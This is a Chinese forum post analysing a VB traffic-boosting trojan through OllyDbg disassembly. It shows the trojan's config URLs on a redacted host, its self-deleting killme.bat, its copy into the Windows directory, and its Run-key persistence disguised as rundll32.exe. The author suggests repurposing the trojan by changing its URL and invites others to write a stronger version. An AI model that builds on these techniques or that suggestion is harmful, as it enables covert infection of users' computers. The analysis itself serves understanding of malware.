对一刷网站访问量的小马分析

系统补丁打完，网上瞎灌，居然还中网马，哎.现在....把他网马down下来，8错，真牛.通杀98.nt.2000.xp.xpsp2.2003.自己留着，随便来分析了下他的木马。一刷流量木马。服了。现在小马都出到这个份上了。

脱壳略，VB编写。

00403DAD . FF15 54104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaHresu>; msvbvm60.__vbaHresultCheckObj

00403DB3 . 8985 E0FCFFFF MOV DWORD PTR SS:[EBP-320],EAX

00403DB9 . EB 0A JMP SHORT Rundll32.00403DC5

00403DBB >C785 E0FCFFFF>MOV DWORD PTR SS:[EBP-320],0

00403DC5 >8B95 60FEFFFF MOV EDX,DWORD PTR SS:[EBP-1A0]

00403DCB . 8995 F8FCFFFF MOV DWORD PTR SS:[EBP-308],EDX

00403DD1 . C785 60FEFFFF>MOV DWORD PTR SS:[EBP-1A0],0

00403DDB . 8B85 F8FCFFFF MOV EAX,DWORD PTR SS:[EBP-308]

00403DE1 . 8985 34FEFFFF MOV DWORD PTR SS:[EBP-1CC],EAX

00403DE7 . C785 2CFEFFFF>MOV DWORD PTR SS:[EBP-1D4],8

00403DF1 . 8D95 2CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1D4]

00403DF7 . 8D8D F8FEFFFF LEA ECX,DWORD PTR SS:[EBP-108]

00403DFD . FF15 08104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarMo>; msvbvm60.__vbaVarMove

00403E03 . C745 FC 06000>MOV DWORD PTR SS:[EBP-4],6

00403E0A . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/adset.txt"

00403E14 . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8

00403E1E . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]

00403E24 . 8D4D A0 LEA ECX,DWORD PTR SS:[EBP-60]

00403E27 . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy

00403E2D . C745 FC 07000>MOV DWORD PTR SS:[EBP-4],7

00403E34 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/adlist.txt"

00403E3E . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8

00403E48 . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]

00403E4E . 8D8D 6CFFFFFF LEA ECX,DWORD PTR SS:[EBP-94]

00403E54 . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy

00403E5A . C745 FC 08000>MOV DWORD PTR SS:[EBP-4],8

00403E61 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/MMResult.asp"

00403E6B . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8

00403E75 . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]

00403E7B . 8D4D 8C LEA ECX,DWORD PTR SS:[EBP-74]

00403E7E . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy

00403E84 . C745 FC 09000>MOV DWORD PTR SS:[EBP-4],9

00403E8B . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/adiepage.txt"

00403E95 . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8

00403E9F . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]

00403EA5 . 8D8D B8FEFFFF LEA ECX,DWORD PTR SS:[EBP-148]

00403EAB . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy

00403EB1 . C745 FC 0A000>MOV DWORD PTR SS:[EBP-4],0A

00403EB8 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/ieFavorites.txt"

00403EC2 . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8

00403ECC . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]

00403ED2 . 8D8D 7CFFFFFF LEA ECX,DWORD PTR SS:[EBP-84]

00403ED8 . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy

00403EDE . C745 FC 0B000>MOV DWORD PTR SS:[EBP-4],0B

00403EE5 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "WinDir"

00403EEF . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8

00403EF9 . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]

00403EFF . 8D8D 2CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1D4]

00403F05 . FF15 6C114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarDu>; msvbvm60.__vbaVarDup

00403F0B . 8D8D 2CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1D4]

00403F11 . 51 PUSH ECX

00403F12 . 8D95 1CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1E4]

00403F18 . 52 PUSH EDX

00403F19 . FF15 60104000 CALL DWORD PTR DS:[<&msvbvm60.rtcEnviron>; msvbvm60.rtcEnvironVar

00403F1F . C785 C4FDFFFF>MOV DWORD PTR SS:[EBP-23C],Rundll32.0040>; UNICODE "\rundll32.exe"

00403F29 . C785 BCFDFFFF>MOV DWORD PTR SS:[EBP-244],8

程序会到http://www.xxxxxxxx.com 的tc 文件读取配置文件，同时访问tc/MMResult.asp

生成文件

00404DA2 . /EB 0A JMP SHORT Rundll32.00404DAE //获取文件路径堆栈

00404DA4 >|C785 88FCFFFF>MOV DWORD PTR SS:[EBP-378],0

00404DAE >\8B85 60FEFFFF MOV EAX,DWORD PTR SS:[EBP-1A0] //我程序路径是 "D:\fuck you"

00404DB4 . 50 PUSH EAX //路径入eax

00404DB5 . 68 80274000 PUSH Rundll32.00402780 ;//生成killme.bat

00404DBA . FF15 48104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCat>; msvbvm60.__vbaStrCat

00404DC0 . 8BD0 MOV EDX,EAX //文件路径+文件名字D:\fuck you\killme.bat

00404DC2 . 8D8D 5CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1A4]

00404DC8 . FF15 80114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrMov>; msvbvm60.__vbaStrMove

00404DCE . 50 PUSH EAX

00404DCF . 6A 01 PUSH 1

00404DD1 . 6A FF PUSH -1

00404DD3 . 6A 02 PUSH 2

00404DD5 . FF15 28114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFileOp>; msvbvm60.__vbaFileOpen

00404DDB . 8D8D 5CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1A4]

00404DE1 . 51 PUSH ECX

00404DE2 . 8D95 60FEFFFF LEA EDX,DWORD PTR SS:[EBP-1A0]

00404DE8 . 52 PUSH EDX

00404DE9 . 6A 02 PUSH 2

00404DEB . FF15 48114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeSt>; msvbvm60.__vbaFreeStrList

00404DF1 . 83C4 0C ADD ESP,0C

00404DF4 . 8D8D 40FEFFFF LEA ECX,DWORD PTR SS:[EBP-1C0]

00404DFA . FF15 A8114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeOb>; msvbvm60.__vbaFreeObj

00404E00 . C745 FC 23000>MOV DWORD PTR SS:[EBP-4],23

00404E07 . 68 9C274000 PUSH Rundll32.0040279C ;@echo off

00404E0C . 6A 01 PUSH 1

00404E0E . 68 B4274000 PUSH Rundll32.004027B4

00404E13 . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile

00404E19 . 83C4 0C ADD ESP,0C

00404E1C . C745 FC 24000>MOV DWORD PTR SS:[EBP-4],24

00404E23 . 68 BC274000 PUSH Rundll32.004027BC ;sleep 100

00404E28 . 6A 01 PUSH 1

00404E2A . 68 B4274000 PUSH Rundll32.004027B4

00404E2F . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile

00404E35 . 83C4 0C ADD ESP,0C

00404E38 . C745 FC 25000>MOV DWORD PTR SS:[EBP-4],25

00404E3F . 833D A8934000>CMP DWORD PTR DS:[4093A8],0

00404E46 . 75 1C JNZ SHORT Rundll32.00404E64

00404E48 . 68 A8934000 PUSH Rundll32.004093A8

00404E4D . 68 94254000 PUSH Rundll32.00402594

00404E52 . FF15 30114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaNew2>] ;msvbvm60.__vbaNew2

00404E58 . C785 84FCFFFF>MOV DWORD PTR SS:[EBP-37C],Rundll32.00409>

00404E62 . EB 0A JMP SHORT Rundll32.00404E6E

00404E64 >C785 84FCFFFF>MOV DWORD PTR SS:[EBP-37C],Rundll32.00409>

00404E6E >8B85 84FCFFFF MOV EAX,DWORD PTR SS:[EBP-37C]

00404E74 . 8B08 MOV ECX,DWORD PTR DS:[EAX]

........

00404F1D . 52 PUSH EDX

00404F1E . FF15 54104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaHresul>; msvbvm60.__vbaHresultCheckObj

00404F24 . 8985 7CFCFFFF MOV DWORD PTR SS:[EBP-384],EAX

00404F2A . EB 0A JMP SHORT Rundll32.00404F36

00404F2C >C785 7CFCFFFF>MOV DWORD PTR SS:[EBP-384],0

00404F36 >68 D4274000 PUSH Rundll32.004027D4 ;del

00404F3B . 8B85 60FEFFFF MOV EAX,DWORD PTR SS:[EBP-1A0] //程序的文件名字

00404F41 . 50 PUSH EAX //文件名入栈 （rundll322）

00404F42 . 68 E4274000 PUSH Rundll32.004027E4 ;.exe （rundll322.exe）

00404F47 . FF15 48104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCat>; msvbvm60.__vbaStrCat

00404F4D . 8BD0 MOV EDX,EAX

00404F4F . 8D8D 5CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1A4]

00404F55 . FF15 80114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrMov>; msvbvm60.__vbaStrMove

00404F5B . 50 PUSH EAX

00404F5C . FF15 48104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCat>; msvbvm60.__vbaStrCat

00404F62 . 8BD0 MOV EDX,EAX //（del rundll322.exe）

00404F64 . 8D8D 58FEFFFF LEA ECX,DWORD PTR SS:[EBP-1A8]

00404F6A . FF15 80114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrMov>; msvbvm60.__vbaStrMove

00404F70 . 50 PUSH EAX

00404F71 . 6A 01 PUSH 1

00404F73 . 68 B4274000 PUSH Rundll32.004027B4

00404F78 . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile

00404F7E . 83C4 0C ADD ESP,0C

00404F81 . 8D8D 58FEFFFF LEA ECX,DWORD PTR SS:[EBP-1A8]

00404F87 . 51 PUSH ECX

00404F88 . 8D95 5CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1A4]

00404F8E . 52 PUSH EDX

00404F8F . 8D85 60FEFFFF LEA EAX,DWORD PTR SS:[EBP-1A0]

00404F95 . 50 PUSH EAX

00404F96 . 6A 03 PUSH 3

00404F98 . FF15 48114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeSt>; msvbvm60.__vbaFreeStrList

00404F9E . 83C4 10 ADD ESP,10

00404FA1 . 8D8D 40FEFFFF LEA ECX,DWORD PTR SS:[EBP-1C0]

00404FA7 . FF15 A8114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeOb>; msvbvm60.__vbaFreeObj

00404FAD . C745 FC 26000>MOV DWORD PTR SS:[EBP-4],26

00404FB4 . 68 F4274000 PUSH Rundll32.004027F4 ;del killme.bat

00404FB9 . 6A 01 PUSH 1

00404FBB . 68 B4274000 PUSH Rundll32.004027B4

00404FC0 . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile

00404FC6 . 83C4 0C ADD ESP,0C

00404FC9 . C745 FC 27000>MOV DWORD PTR SS:[EBP-4],27

00404FD0 . 68 18284000 PUSH Rundll32.00402818 ;cls

00404FD5 . 6A 01 PUSH 1

00404FD7 . 68 B4274000 PUSH Rundll32.004027B4

00404FDC . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile

00404FE2 . 83C4 0C ADD ESP,0C

00404FE5 . C745 FC 28000>MOV DWORD PTR SS:[EBP-4],28

00404FEC . 68 24284000 PUSH Rundll32.00402824 ;exit

00404FF1 . 6A 01 PUSH 1

00404FF3 . 68 B4274000 PUSH Rundll32.004027B4

00404FF8 . FF15 F8104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile

00404FFE . 83C4 0C ADD ESP,0C

00405001 . C745 FC 29000>MOV DWORD PTR SS:[EBP-4],29

00405008 . 6A 01 PUSH 1

0040500A . FF15 A4104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaFileCl>; msvbvm60.__vbaFileClose

00405010 . C745 FC 2A000>MOV DWORD PTR SS:[EBP-4],2A

00405017 . 833D A8934000>CMP DWORD PTR DS:[4093A8],0

0040501E . 75 1C JNZ SHORT Rundll32.0040503C

00405020 . 68 A8934000 PUSH Rundll32.004093A8

00405025 . 68 94254000 PUSH Rundll32.00402594

生成批处删记录

killme.bat

echo off

sleep 100

del rundll322.exe

del killme.bat

cls

exit

简单的写注册表run。

004046ED . BA 5C284000 MOV EDX,Rundll32.0040285C ;software\microsoft\windows\currentversion\run

004046F2 . 8D8D 08FFFFFF LEA ECX,DWORD PTR SS:[EBP-F8]

004046F8 . FF15 40114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCop>; msvbvm60.__vbaStrCopy

004046FE . C745 FC 17000>MOV DWORD PTR SS:[EBP-4],17

00404705 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.00402>; windir

0040470F . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8

00404719 . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]

0040471F . 8D8D 2CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1D4]

00404725 . FF15 6C114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarDup>; msvbvm60.__vbaVarDup

0040472B . 8D95 2CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1D4]

00404731 . 52 PUSH EDX

00404732 . 8D85 1CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1E4]

00404738 . 50 PUSH EAX

00404739 . FF15 60104000 CALL DWORD PTR DS:[<&msvbvm60.rtcEnvironV>; msvbvm60.rtcEnvironVar

0040473F . C785 C4FDFFFF>MOV DWORD PTR SS:[EBP-23C],Rundll32.00402>; \rundll32.exe

直接给出分析的总结吧。版权 BY。混世魔王 QQ：26836659

程序只是为了刷访问量。没有什么后门。也就隐藏了URL。用XXXX代理了。

程序运行后，你的电脑会访问 http://www.xxxxxxxx.com/tc/MMResult.asp

看代码

‘地址用xxx代替了

’站长站的流量统计

把自身复制到c:/windows/

会生成批处删本地目录运行程序。

killme.bat

echo off

sleep 100

del rundll322.exe

del killme.bat

cls

exit

程序的运行方式是 写注册表

software\microsoft\windows\currentversion\run

键值rundll32.exe

程序写的不好，要插入进程，那效果会点。

只要把他程序的URL 修改一下这个木马就可以自己使用了.

有不足，还希指出。

程序编写很简单，但是技术丢了好久了，不去恶补写不出，也没有时间去恶补。

有编程不错的，写了记得传我一个。呵呵。msn：hsmw26836659@hotmail.com